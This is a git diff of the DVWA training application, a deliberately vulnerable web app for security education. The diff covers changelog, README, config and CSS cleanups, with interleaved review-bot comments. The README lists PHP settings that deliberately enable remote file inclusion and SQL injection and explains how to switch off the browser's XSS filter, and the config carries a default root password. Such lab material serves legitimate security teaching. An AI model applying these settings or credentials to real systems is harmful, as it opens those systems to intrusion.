diff --git a/CHANGELOG.md b/CHANGELOG.md
index 01edfaf96..4c036c5fe 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -4,30 +4,36 @@ DAMN VULNERABLE WEB APPLICATION v1.9 (*Not Yet Released*) ====== -+ Added CSRF token to pre-auth forms (login/setup/security pages). (g0tmi1k + Shinkurt) -+ Added HTTPOnly cookie flag on impossible levels. (g0tmi1k) -+ Added PDO for the impossible examples in SQLi & SQLi Blind. (g0tmi1k) -+ Added system check to setup. (g0tmi1k) -+ Changed brute force medium to be harder due to sleep. (g0tmi1k) -+ Changed file include landing page + added 3x example pages. (g0tmi1k) -+ Changed file include medium to be harder due to more filters. (g0tmi1k) -+ Changed HTTP REFERER check for medium level CSRF. (g0tmi1k) -+ Changed input box for medium level with SQLi + SQLi Blind. (g0tmi1k) -+ Changed SQLi + SQLi Blind to be $_POST rather than $_GET. (g0tmi1k) -+ Changed SQLi Blind to be a real example of the vulnerability. (g0tmi1k) -+ Fixed brute force and file upload impossible levels, as they were vulnerable. (g0tmi1k + Shinkurt) -+ Fixed bug with file fnclude page not loading. (g0tmi1k) -+ Fixed CAPTCHA bug to read URL parameters on impossible. (g0tmi1k) -+ Fixed CAPTCHA bug where the form wouldn't be visible. (g0tmi1k) -+ Fixed CAPTCHA bug where the URL parameters were not being used for low + medium. (g0tmi1k) -+ Fixed CSRF medium level bug when not on localhost. (g0tmi1k) -+ Fixed setup bug with custom URL path. (g0tmi1k) -+ Removed PostgreSQL DB support. (g0tmi1k) -+ Renamed 'Command Execution' to 'Command Injection'. (g0tmi1k) -+ Renamed 'high' level to 'impossible' and created new vectors for 'high'. (g0tmi1k) -+ Updated README and documentation. (g0tmi1k) -+ Various code cleanups in the core PHP files+CSS & Verbosed the documentation. (g0tmi1k) -+ Various setup improvements (e.g. redirection + limited menu links). (g0tmi1k) ++ Added a dedicated objective (or "flag") for file include. (@g0tmi1k) ++ Added a warning to any module that requires a certain configuration. (@g0tmi1k) ++ Added comments to all source code that would be visible via DVWA modules. 
(@g0tmi1k) ++ Added CSRF token to pre-auth forms (login/setup/security pages). (@g0tmi1k + @Shinkurt) ++ Added HttpOnly cookie flag on impossible levels. (@g0tmi1k) ++ Added more detail to the documentation. (@g0tmi1k) ++ Added PDO to all impossible levels requiring MySQL. (@g0tmi1k) ++ Added PHPIDS options into the config file. (@g0tmi1k) ++ Added system check to setup. (@g0tmi1k) ++ Added various information to all help pages for every module. (@g0tmi1k) ++ Changed brute force medium to be harder due to sleep. (@g0tmi1k) ++ Changed file include landing page + added 3x example pages. (@g0tmi1k) ++ Changed file include medium to be harder due to more filters. (@g0tmi1k) ++ Changed HTTP REFERER check for medium level CSRF. (@g0tmi1k) ++ Changed input box for medium level with SQLi + SQLi Blind. (@g0tmi1k) ++ Changed SQLi + SQLi Blind to be $_POST rather than $_GET. (@g0tmi1k) ++ Changed SQLi Blind to be a real example of the vulnerability. (@g0tmi1k) ++ Fixed brute force and file upload impossible levels, as they were vulnerable. (@g0tmi1k + @Shinkurt) ++ Fixed bug with file fnclude page not loading. (@g0tmi1k) ++ Fixed CAPTCHA bug to read URL parameters on impossible. (@g0tmi1k) ++ Fixed CAPTCHA bug where the form wouldn't be visible. (@g0tmi1k) ++ Fixed CAPTCHA bug where the URL parameters were not being used for low + medium. (@g0tmi1k) ++ Fixed CSRF medium level bug when not on localhost. (@g0tmi1k) ++ Fixed setup bug with custom URL path. (@g0tmi1k) ++ Removed PostgreSQL DB support. (@g0tmi1k) ++ Renamed 'Command Execution' to 'Command Injection'. (@g0tmi1k) ++ Renamed 'high' level to 'impossible' and created new vectors for 'high'. (@g0tmi1k) ++ Updated README and documentation. (@g0tmi1k) ++ Various code cleanups in the core PHP files+CSS. (@g0tmi1k) ++ Various setup improvements (e.g. redirection + limited menu links). (@g0tmi1k) v1.8 (2013-05-01) ====== 
@@ -40,42 +46,42 @@ v1.8 (2013-05-01) v1.0.7 (2010-09-08) ====== -+ Re-designed the login page + made some other slight cosmetic changes. 06/06/2010 (ethicalhack3r) -+ Started PostgreSQL implementation. 15/03/2010 (ethicalhack3r) -+ A few small cosmetic changes. 15/03/2010 (ethicalhack3r) -+ Improved the help information and look. 15/03/2010 (ethicalhack3r) -+ Fixed a few bugs thanks to Digininja. 15/03/2010 (ethicalhack3r) ++ Re-designed the login page + made some other slight cosmetic changes. 06/06/2010 (@ethicalhack3r) ++ Started PostgreSQL implementation. 15/03/2010 (@ethicalhack3r) ++ A few small cosmetic changes. 15/03/2010 (@ethicalhack3r) ++ Improved the help information and look. 15/03/2010 (@ethicalhack3r) ++ Fixed a few bugs thanks to @Digininja. 15/03/2010 (@ethicalhack3r) + Show logged in username. 05/02/2010 (Jason Jones) -+ Added new info on RandomStorm. 04/02/2010 (ethicalhack3r) -+ Added 'SQL Injection (Blind)'. 04/02/2010 (ethicalhack3r) -+ Added official documentation. 21/11/2009 (ethicalhack3r) -+ Implemented view all source functionality. 16/10/2009 (tmacuk, craig, ethicalhack3r) ++ Added new info on RandomStorm. 04/02/2010 (@ethicalhack3r) ++ Added 'SQL Injection (Blind)'. 04/02/2010 (@ethicalhack3r) ++ Added official documentation. 21/11/2009 (@ethicalhack3r) ++ Implemented view all source functionality. 16/10/2009 (tmacuk, craig, @ethicalhack3r) v1.0.6 (2009-10-05) ====== -+ Fixed a bug where the logo would not show on first time use. 03/09/2009 (ethicalhack3r) -+ Removed 'current password' input box for low+med CSRF security. 03/09/2009 (ethicalhack3r) -+ Added an article which was written for OWASP Turkey. 03/10/2009 (ethicalhack3r) -+ Added more toubleshooting information. 02/10/2009 (ethicalhack3r) -+ Stored XSS high now sanitises output. 02/10/2009 (ethicalhack3r) -+ Fixed a 'bug' in XSS stored low which made it not vulnerable. 02/10/2009 (ethicalhack3r) -+ Rewritten command execution high to use a whitelist. 
30/09/09 (ethicalhack3r) -+ Fixed a command execution vulnerability in exec high. 17/09/09 (ethicalhack3r) -+ Added some troubleshooting info for PHP 5.2.6 in readme.txt. 17/09/09 (ethicalhack3r) -+ Added the upload directory to the upload help. 17/09/09 (ethicalhack3r) ++ Fixed a bug where the logo would not show on first time use. 03/09/2009 (@ethicalhack3r) ++ Removed 'current password' input box for low+med CSRF security. 03/09/2009 (@ethicalhack3r) ++ Added an article which was written for OWASP Turkey. 03/10/2009 (@ethicalhack3r) ++ Added more toubleshooting information. 02/10/2009 (@ethicalhack3r) ++ Stored XSS high now sanitises output. 02/10/2009 (@ethicalhack3r) ++ Fixed a 'bug' in XSS stored low which made it not vulnerable. 02/10/2009 (@ethicalhack3r) ++ Rewritten command execution high to use a whitelist. 30/09/09 (@ethicalhack3r) ++ Fixed a command execution vulnerability in exec high. 17/09/09 (@ethicalhack3r) ++ Added some troubleshooting info for PHP 5.2.6 in readme.txt. 17/09/09 (@ethicalhack3r) ++ Added the upload directory to the upload help. 17/09/09 (@ethicalhack3r) v1.0.5 (2009-09-03) ====== -+ Made IE friendly as much as possible. 30/08/2009 (ethicalhack3r) -+ Removed the acunetix scan report. 30/08/2009 (ethicalhack3r) -+ Added 'Clear Log' button to PHPIDS parser. 27/08/2009 (ethicalhack3r) -+ Implemented PHPIDS log parser. 27/08/2009 (ethicalhack3r) -+ Implemented Stored XSS vulnerability. 27/08/2009 (ethicalhack3r) -+ Added htaccess rule for localhost access only. 22/08/2009 (ethicalhack3r) -+ Added CSRF. 01/08/2009 (ethicalhack3r) -+ Implemented sessions/login. 01/08/2009 (ethicalhack3r) ++ Made IE friendly as much as possible. 30/08/2009 (@ethicalhack3r) ++ Removed the acunetix scan report. 30/08/2009 (@ethicalhack3r) ++ Added 'Clear Log' button to PHPIDS parser. 27/08/2009 (@ethicalhack3r) ++ Implemented PHPIDS log parser. 27/08/2009 (@ethicalhack3r) ++ Implemented Stored XSS vulnerability. 
27/08/2009 (@ethicalhack3r) ++ Added htaccess rule for localhost access only. 22/08/2009 (@ethicalhack3r) ++ Added CSRF. 01/08/2009 (@ethicalhack3r) ++ Implemented sessions/login. 01/08/2009 (@ethicalhack3r) + Complete recode. (jamesr) + Complete redesign. (jamesr) + Delimited 'dvwa' in session- minimising the risk of clash with other projects running on localhost. 01/08/2009 (jamesr) diff --git a/README.md b/README.md index 8da0c1339..9fd47751d 100644 --- a/README.md +++ b/README.md @@ -42,9 +42,9 @@ along with Damn Vulnerable Web Application (DVWA). If not, see http://www.gnu.o DVWA is available either as a package that will run on your own web server or as a Live CD: - + DVWA v1.9 (Testing) - (1.3 MB) [Download ZIP](https://github.com/RandomStorm/DVWA/archive/master.zip) - `git clone https://github.com/RandomStorm/DVWA` - + DVWA v1.8 (Stable) - (1.3 MB) [Download ZIP](https://github.com/RandomStorm/DVWA/archive/v1.0.8.zip) - + DVWA v1.0.7 LiveCD - (480 MB) [Download ISO](http://www.dvwa.co.uk/DVWA-1.0.7.iso) + + DVWA v1.9 Source (Testing) - \[1.3 MB\] [Download ZIP](https://github.com/RandomStorm/DVWA/archive/master.zip) // `git clone https://github.com/RandomStorm/DVWA` + + DVWA v1.8 Source (Stable) - \[1.3 MB\] [Download ZIP](https://github.com/RandomStorm/DVWA/archive/v1.0.8.zip) - Released 2013-05-01 + + DVWA v1.0.7 LiveCD - \[480 MB\] [Download ISO](http://www.dvwa.co.uk/DVWA-1.0.7.iso) - Released 2010-09-08 - - - 
@@ -90,12 +90,12 @@ $_DVWA[ 'db_database' ] = 'dvwa'; Depening on your Operating System as well as version of PHP, you may wish to alter the default configuration. The location of the files will be different on a per-machine basis. Note, You are unable to use PHP v7.0 or later with DVWA. -**Folders Permissions**: +**Folder Permissions**: * `./hackable/uploads/` - Needs to be writable by the web service (for File Upload). -* `./external/phpids/0.6/lib/IDS/tmp/` - Needs to be writable by the web service (if you wish to use PHPIDS). +* `./external/phpids/0.6/lib/IDS/tmp/phpids_log.txt` - Needs to be writable by the web service (if you wish to use PHPIDS). -**PHP**: +**PHP configuration**: * `allow_url_include = on` - Allows for Remote File Inclusions (RFI) [[allow_url_include](https://secure.php.net/manual/en/filesystem.configuration.php#ini.allow-url-include)] * `allow_url_fopen = on` - Allows for Remote File Inclusions (RFI) [[allow_url_fopen](https://secure.php.net/manual/en/filesystem.configuration.php#ini.allow-url-fopen)] @@ -103,9 +103,9 @@ Note, You are unable to use PHP v7.0 or later with DVWA. * `magic_quotes_gpc = off` - (If PHP <= v5.4) Allows for SQL Injection (SQLi) [[magic_quotes_gpc](https://secure.php.net/manual/en/security.magicquotes.php)] * `display_errors = off` - (Optional) Hides PHP warning messages to make it less verbose [[display_errors](https://secure.php.net/manual/en/errorfunc.configuration.php#ini.display-errors)] -**`config/config.inc.php`**: +**File: `config/config.inc.php`**: -* `$_DVWA[ 'recaptcha_public_key' ]` & `$_DVWA[ 'recaptcha_private_key' ]` - Need to be generated from: https://www.google.com/recaptcha/admin/create +* `$_DVWA[ 'recaptcha_public_key' ]` & `$_DVWA[ 'recaptcha_private_key' ]` - These values need to be generated from: https://www.google.com/recaptcha/admin/create ### Default Credentials 
@@ -122,9 +122,9 @@ Login URL: http://127.0.0.1/dvwa/login.php For the latest troubleshooting information please visit: https://github.com/RandomStorm/DVWA/issues -+Q. SQL Injection wont work on PHP version 5.2.6. ++Q. SQL Injection wont work on PHP v5.2.6. --A.If you are using PHP version 5.2.6 you will need to do the following in order for SQL injection and other vulnerabilities to work. +-A.If you are using PHP v5.2.6 you will need to do the following in order for SQL injection and other vulnerabilities to work. In `.htaccess`: @@ -154,7 +154,7 @@ With: +Q. My XSS payload won't run in IE. --A. If your running IE8 or above IE actively filters any XSS. To disable the filter you can do so by setting the HTTP header `X-XSS-Protection: 0` or disable it from internet options. There may also be ways to bypass the filter. +-A. If your running IE8 or above, IE actively filters any XSS. To disable the filter you can do so by setting the HTTP header `X-XSS-Protection: 0` or disable it from internet options. There may also be ways to bypass the filter. - - - diff --git a/about.php b/about.php index a80089b13..3e147e720 100644 --- a/about.php +++ b/about.php @@ -1,46 +1,46 @@

About

-

Version ".dvwaVersionGet()." (Release date: ".dvwaReleaseDateGet().")

+

Version " . dvwaVersionGet() . " (Release date: " . dvwaReleaseDateGet() . ")

Damn Vulnerable Web Application (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment

The official documentation for DVWA can be found here.

DVWA is a RandomStorm OpenSource project. All material is copyright 2008-2015 RandomStorm & Ryan Dewhurst.

Links

Credits

License

@@ -48,12 +48,11 @@ it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.

-

The PHPIDS library is included, in good faith, with this DVWA distribution. The operation of PHPIDS is provided without support from the DVWA team. It is licensed under separate terms to the DVWA code.

+

The PHPIDS library is included, in good faith, with this DVWA distribution. The operation of PHPIDS is provided without support from the DVWA team. It is licensed under separate terms to the DVWA code.

Development

Everyone is welcome to contribute and help make DVWA as successful as it can be. All contributors can have their name and link (if they wish) placed in the credits section. To contribute pick an Issue from the Project Home to work on or submit a patch to the Issues list.

- -"; +\n"; dvwaHtmlEcho( $page ); exit; diff --git a/config/config.inc.php b/config/config.inc.php index 763a006bb..37c190cda 100644 --- a/config/config.inc.php +++ b/config/config.inc.php @@ -17,17 +17,28 @@ $_DVWA[ 'db_user' ] = 'root'; $_DVWA[ 'db_password' ] = 'p@ssw0rd'; -# Only used for PostgreSQL/PGSQL +# Only used with PostgreSQL/PGSQL database selection. $_DVWA[ 'db_port '] = '5432'; # ReCAPTCHA settings -# Get your keys at https://www.google.com/recaptcha/admin/create +# Used for the 'Insecure CAPTCHA' module +# You'll need to generate your own keys at: https://www.google.com/recaptcha/admin/create $_DVWA[ 'recaptcha_public_key' ] = ''; $_DVWA[ 'recaptcha_private_key' ] = ''; # Default security level -# The default is impossible, you may wish to set this to either low, medium or high. -# If you specify an invalid level, DVWA will default to impossible. +# Default value for the secuirty level with each session. +# The default is 'impossible'. You may wish to set this to either 'low', 'medium', 'high' or impossible'. $_DVWA[ 'default_security_level' ] = 'impossible'; +# Default PHPIDS status +# PHPIDS status with each session. +# The default is 'disabled'. You can set this to be either 'enabled' or 'disabled'. +$_DVWA[ 'default_phpids_level' ] = 'disabled'; + +# Verbose PHPIDS messages +# Enabling this will show why the WAF blocked the request on the blocked request. +# The default is 'disabled'. You can set this to be either 'true' or 'false'. +$_DVWA[ 'default_phpids_verbose' ] = 'false'; + ?> diff --git a/dvwa/css/help.css b/dvwa/css/help.css index 286618066..abe9ebf5e 100644 --- a/dvwa/css/help.css +++ b/dvwa/css/help.css @@ -8,11 +8,9 @@ h1 { font-size: 25px; } - div#container { } - div#code { background-color: #ffffff; } @@ -20,3 +18,8 @@ div#code { div#area { margin-left: 30px; } + +span.spoiler { + background-color: black; + color: black; +} diff --git a/dvwa/css/login.css b/dvwa/css/login.css index e8d89ab2f..e4727a02e 100644 
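Review bot: The comment added above `$_DVWA[ 'default_phpids_verbose' ]` says the default is 'disabled', but the value assigned and the documented choices are the strings 'true'/'false'; one side should change, e.g. `# The default is 'false'. You can set this to be either 'true' or 'false'.`. Because the setting is a string and not a bool, `'false'` is truthy in PHP, so whatever reads it has to compare against the string rather than cast it — the reader is not part of this diff, so worth confirming. The new `default_security_level` comment also carries a typo ('secuirty') and is missing the opening quote before `impossible'`.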
--- a/dvwa/css/login.css +++ b/dvwa/css/login.css @@ -1,8 +1,27 @@ body { background: #fefffe; font: 12px/15px Arial, Helvetica, sans-serif; - line-height:20px; - color:#6b6b6b; + line-height: 20px; + color: #6b6b6b; +} + +#wrapper { + text-align: center; + margin: 0 auto; +} + +#content { + display: inline-block; + padding: 20px; + width: auto; +} + +#footer { + position: absolute; + width: 100%; + height: 50px; + bottom: 0px; + left: 0px; } label { @@ -15,7 +34,7 @@ label { font-weight: bold; } -.loginInput{ +.loginInput { float: left; color: #6B6B6B; width: 320px; @@ -31,9 +50,10 @@ fieldset { width: 350px; padding: 10px 20px 10px 20px; overflow: hidden; - border-style:none; + border-style: none; } p { font-size: 10px; } + diff --git a/dvwa/css/main.css b/dvwa/css/main.css index e713947c3..82e6658a4 100644 --- a/dvwa/css/main.css +++ b/dvwa/css/main.css @@ -1,13 +1,13 @@ -body{ - margin:0; +body { + margin: 0; color: #2f2f2f; font: 12px/15px Arial, Helvetica, sans-serif; - min-width:981px; + min-width: 981px; height: 100%; - position:relative; + position: relative; } -body.home{ +body.home { background: #e7e7e7; } @@ -25,7 +25,7 @@ a img { border: 0; } -a:hover { +a: hover { text-decoration: none; } @@ -34,29 +34,25 @@ input, textarea, select { vertical-align: middle; } -form,fieldset{ +form,fieldset { margin: 0; padding: 0; border-style: none; } - em { font-weight: bold; font-style: normal; } - h1, h2, h3, h4, h5, h6 { margin-top: 0px; } - h1 { font-size: 200%; } - h2 { font-size: 160%; } @@ -66,7 +62,6 @@ h3 { font-size: 130%; } - hr { border-width: 0px; color: #C3D9FF; @@ -74,7 +69,6 @@ hr { height: 1px; } - ul.menuBlocks { list-style-type: none; padding-left: 0px; @@ -83,18 +77,15 @@ ul.menuBlocks { margin-left: 0px; } - ul + ul, ul + ul.menuBlocks, ul + h1, ul + h2, ul + p { margin-top: 20px; } - .fixed { font-family: Fixed, Courier, monospace; font-size: 13px; } - div.warning { border: 2px solid #ff0000; padding: 10px 20px 10px 20px; 
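Review bot: `a: hover` in the `@@ -25,7 +25,7 @@` hunk of main.css is no longer a pseudo-class selector — a space after the colon makes the selector invalid, so browsers discard the whole rule and links keep their underline on hover. The same break is introduced twice in the `@@ -173,40 +160,33 @@` hunk (`div#main_menu li: hover` and `div#main_menu li: hover a`). The space-after-colon normalisation is right for declarations but must not be applied to selectors; these three lines should stay `a:hover {`, `div#main_menu li:hover {` and `div#main_menu li:hover a {`.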
@@ -120,13 +111,13 @@ div#container { height: 100%; margin-left: auto; margin-right: auto; - background:#f4f4f4; + background: #f4f4f4; font-size: 13px; } div#header { padding: 10px; - overflow:hidden; + overflow: hidden; background: #2f2f2f; border-bottom: 5px solid #A1CC33; text-align: center; @@ -137,9 +128,8 @@ div#system_info { text-align: right; } - div#main_body { - float:right; + float: right; width: 693px; background: #f4f4f4; padding-top: 20px; @@ -147,13 +137,11 @@ div#main_body { font-size: 13px; } - div.body_padded { padding-left: 20px; padding-right: 20px; } - div#main_menu { float: left; width: 200px; @@ -163,7 +151,6 @@ div#main_menu { padding-bottom: 10px; } - div#main_menu li { border-width: 1px; border-style: solid; @@ -173,40 +160,33 @@ div#main_menu li { background-color: #bebebe; } - div#main_menu li a { color: #000000; text-decoration: none; text-decoration: none; } - div#main_menu li.selected { border-color: #758DAE #758DAE #758DAE #758DAE; background-color: #99cc33; } - div#main_menu li.selected a { color: #F9F7ED; } - -div#main_menu li:hover { +div#main_menu li: hover { border-color: #D2D4D4; } - -div#main_menu li:hover a { +div#main_menu li: hover a { color: #F9F7ED; } - div#main_menu_padded { padding: 15px; } - div#footer { color: #999999; background: #2f2f2f; @@ -215,7 +195,6 @@ div#footer { border-top: 5px solid #A1CC33; } - input.popup_button { border-width: 1px; border-style: solid; @@ -226,7 +205,6 @@ input.popup_button { float: right; } - div.vulnerable_code_area { background-color: #f8fafa; border-width: 1px; @@ -253,12 +231,10 @@ div#idslog { background-color: #f8fafa; } - pre { color: red; } - div.submenu { border-bottom: 1px solid #000000; margin-bottom: 15px; 
@@ -266,18 +242,25 @@ div.submenu { font-size: 13px; } - span.submenu_item { padding: 0px 10px 0px 10px; } - span.submenu_item + span.submenu_item { border-left: 1px dashed #000000; font-size: 13px; } - span.selected { font-weight: bold; } + +span.success { + + color:green; +} + +span.failure { + color:red; + font-weight: bold; +} diff --git a/dvwa/css/source.css b/dvwa/css/source.css index 286618066..7d996c2f5 100644 --- a/dvwa/css/source.css +++ b/dvwa/css/source.css @@ -8,11 +8,9 @@ h1 { font-size: 25px; } - div#container { } - div#code { background-color: #ffffff; } diff --git a/dvwa/includes/dvwaPage.inc.php b/dvwa/includes/dvwaPage.inc.php index 021fe3f31..88ff699b0 100644 --- a/dvwa/includes/dvwaPage.inc.php +++ b/dvwa/includes/dvwaPage.inc.php @@ -8,24 +8,29 @@ session_start(); // Creates a 'Full Path Disclosure' vuln. // Include configs -require_once DVWA_WEB_PAGE_TO_ROOT.'config/config.inc.php'; +require_once DVWA_WEB_PAGE_TO_ROOT . 'config/config.inc.php'; require_once( 'dvwaPhpIds.inc.php' ); // Declare the $html variable -if(!isset( $html )) { +if( !isset( $html ) ) { $html = ""; } // Valid security levels $security_levels = array('low', 'medium', 'high', 'impossible'); -if(!isset( $_COOKIE[ 'security' ] ) || !in_array( $_COOKIE[ 'security' ], $security_levels ) ) { - // Set security cookie to impossible if no cookie exists - if( in_array( $_DVWA[ 'default_security_level' ], $security_levels) ) { +if( !isset( $_COOKIE[ 'security' ] ) || !in_array( $_COOKIE[ 'security' ], $security_levels ) ) { + // Set security cookie to impossible if no cookie exists + if( in_array( $_DVWA[ 'default_security_level' ], $security_levels) ) { dvwaSecurityLevelSet( $_DVWA[ 'default_security_level' ] ); - } - else { + } + else { dvwaSecurityLevelSet( 'impossible' ); } + + if( $_DVWA[ 'default_phpids_level' ] == 'enabled' ) + dvwaPhpIdsEnabledSet( true ); + else + dvwaPhpIdsEnabledSet( false ); } // DVWA version 
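Review bot: The new `span.success` rule has a stray blank line before its only declaration, and both new rules write `color:green` / `color:red` without the space after the colon that this same commit introduces in every other declaration of main.css. Dropping the blank line and writing `color: green;` / `color: red;` keeps the file consistent with the style the commit is establishing.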
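Review bot: The new PHPIDS default at the end of the `@@ -8,24 +8,29 @@` hunk uses a loose `==` and an unbraced if/else, and unlike the security level a few lines above it is never validated against the documented set ('enabled'/'disabled'), so any other string silently disables PHPIDS. One line covers both points: `dvwaPhpIdsEnabledSet( $_DVWA[ 'default_phpids_level' ] === 'enabled' );`. Note also that this runs only inside the branch taken when the `security` cookie is missing or invalid, so the configured default applies to a fresh session but not to an existing one; if that is intended, a one-line comment such as `// Apply the configured PHPIDS default together with the initial security level` would make it explicit.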
@@ -52,7 +57,7 @@ function &dvwaSessionGrab() { function dvwaPageStartup( $pActions ) { if( in_array( 'authenticated', $pActions ) ) { if( !dvwaIsLoggedIn()) { - dvwaRedirect( DVWA_WEB_PAGE_TO_ROOT.'login.php' ); + dvwaRedirect( DVWA_WEB_PAGE_TO_ROOT . 'login.php' ); } } @@ -112,12 +117,12 @@ function dvwaCurrentUser() { function &dvwaPageNewGrab() { $returnArray = array( - 'title' => 'Damn Vulnerable Web Application (DVWA) v'.dvwaVersionGet().'', + 'title' => 'Damn Vulnerable Web Application (DVWA) v' . dvwaVersionGet() . '', 'title_separator' => ' :: ', - 'body' => '', - 'page_id' => '', - 'help_button' => '', - 'source_button' => '', + 'body' => '', + 'page_id' => '', + 'help_button' => '', + 'source_button' => '', ); return $returnArray; } @@ -162,7 +167,7 @@ function dvwaMessagePop() { function messagesPopAllToHtml() { $messagesHtml = ''; - while( $message = dvwaMessagePop() ) { // TODO- sharpen! + while( $message = dvwaMessagePop() ) { // TODO- sharpen! $messagesHtml .= "
{$message}
"; } 
@@ -187,16 +192,16 @@ function dvwaHtmlEcho( $pPage ) { if( dvwaIsLoggedIn() ) { $menuBlocks[ 'vulnerabilities' ] = array(); - $menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'brute', 'name' => 'Brute Force', 'url' => 'vulnerabilities/brute/.' ); - $menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'exec', 'name' => 'Command Injection', 'url' => 'vulnerabilities/exec/.' ); - $menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'csrf', 'name' => 'CSRF', 'url' => 'vulnerabilities/csrf/.' ); + $menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'brute', 'name' => 'Brute Force', 'url' => 'vulnerabilities/brute/' ); + $menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'exec', 'name' => 'Command Injection', 'url' => 'vulnerabilities/exec/' ); + $menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'csrf', 'name' => 'CSRF', 'url' => 'vulnerabilities/csrf/' ); $menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'fi', 'name' => 'File Inclusion', 'url' => 'vulnerabilities/fi/.?page=include.php' ); - $menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'upload', 'name' => 'File Upload', 'url' => 'vulnerabilities/upload/.' ); - $menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'captcha', 'name' => 'Insecure CAPTCHA', 'url' => 'vulnerabilities/captcha/.' ); - $menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'sqli', 'name' => 'SQL Injection', 'url' => 'vulnerabilities/sqli/.' ); - $menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'sqli_blind', 'name' => 'SQL Injection (Blind)', 'url' => 'vulnerabilities/sqli_blind/.' ); - $menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'xss_r', 'name' => 'XSS (Reflected)', 'url' => 'vulnerabilities/xss_r/.' ); - $menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'xss_s', 'name' => 'XSS (Stored)', 'url' => 'vulnerabilities/xss_s/.' 
); + $menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'upload', 'name' => 'File Upload', 'url' => 'vulnerabilities/upload/' ); + $menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'captcha', 'name' => 'Insecure CAPTCHA', 'url' => 'vulnerabilities/captcha/' ); + $menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'sqli', 'name' => 'SQL Injection', 'url' => 'vulnerabilities/sqli/' ); + $menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'sqli_blind', 'name' => 'SQL Injection (Blind)', 'url' => 'vulnerabilities/sqli_blind/' ); + $menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'xss_r', 'name' => 'XSS (Reflected)', 'url' => 'vulnerabilities/xss_r/' ); + $menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'xss_s', 'name' => 'XSS (Stored)', 'url' => 'vulnerabilities/xss_s/' ); } $menuBlocks[ 'meta' ] = array(); @@ -223,7 +228,7 @@ function dvwaHtmlEcho( $pPage ) { $menuHtml .= ""; } - // Get security cookie -- + // Get security cookie -- $securityLevelHtml = ''; switch( dvwaSecurityLevelGet() ) { case 'low': @@ -239,10 +244,10 @@ function dvwaHtmlEcho( $pPage ) { $securityLevelHtml = 'impossible'; break; } - // -- END (security cookie) + // -- END (security cookie) - $phpIdsHtml = 'PHPIDS: '.( dvwaPhpIdsIsEnabled() ? 'enabled' : 'disabled' ); - $userInfoHtml = 'Username: '.( dvwaCurrentUser() ); + $phpIdsHtml = 'PHPIDS: ' . ( dvwaPhpIdsIsEnabled() ? 'enabled' : 'disabled' ); + $userInfoHtml = 'Username: ' . ( dvwaCurrentUser() ); $messagesHtml = messagesPopAllToHtml(); if( $messagesHtml ) { @@ -253,16 +258,16 @@ function dvwaHtmlEcho( $pPage ) { if( dvwaIsLoggedIn() ) $systemInfoHtml = "
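Review bot: The `fi` menu entry keeps `'vulnerabilities/fi/.?page=include.php'` while every sibling line in this hunk drops the trailing `/.`; if the dot is not needed there either, the line should read `$menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'fi', 'name' => 'File Inclusion', 'url' => 'vulnerabilities/fi/?page=include.php' );`. If it is kept on purpose (the diff does not show why), a short comment on that line would stop the next cleanup from removing it. The enclosing dvwaHtmlEcho() starts before and continues past this hunk.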
{$userInfoHtml}
Security Level: {$securityLevelHtml}
{$phpIdsHtml}
"; if( $pPage[ 'source_button' ] ) { - $systemInfoHtml = dvwaButtonSourceHtmlGet( $pPage[ 'source_button' ] )." $systemInfoHtml"; + $systemInfoHtml = dvwaButtonSourceHtmlGet( $pPage[ 'source_button' ] ) . " $systemInfoHtml"; } if( $pPage[ 'help_button' ] ) { - $systemInfoHtml = dvwaButtonHelpHtmlGet( $pPage[ 'help_button' ] )." $systemInfoHtml"; + $systemInfoHtml = dvwaButtonHelpHtmlGet( $pPage[ 'help_button' ] ) . " $systemInfoHtml"; } - // Send Headers + main HTML code - Header( 'Cache-Control: no-cache, must-revalidate'); // HTTP/1.1 - Header( 'Content-Type: text/html;charset=utf-8' ); // TODO- proper XHTML headers... - Header( 'Expires: Tue, 23 Jun 2009 12:00:00 GMT' ); // Date in the past + // Send Headers + main HTML code + Header( 'Cache-Control: no-cache, must-revalidate'); // HTTP/1.1 + Header( 'Content-Type: text/html;charset=utf-8' ); // TODO- proper XHTML headers... + Header( 'Expires: Tue, 23 Jun 2009 12:00:00 GMT' ); // Date in the past echo " @@ -274,11 +279,11 @@ function dvwaHtmlEcho( $pPage ) { {$pPage[ 'title' ]} - + - + - + @@ -287,7 +292,7 @@ function dvwaHtmlEcho( $pPage ) {
- \"Damn + \"Damn
@@ -316,7 +321,7 @@ function dvwaHtmlEcho( $pPage ) {
-

Damn Vulnerable Web Application (DVWA) v".dvwaVersionGet()."

+

Damn Vulnerable Web Application (DVWA) v" . dvwaVersionGet() . "

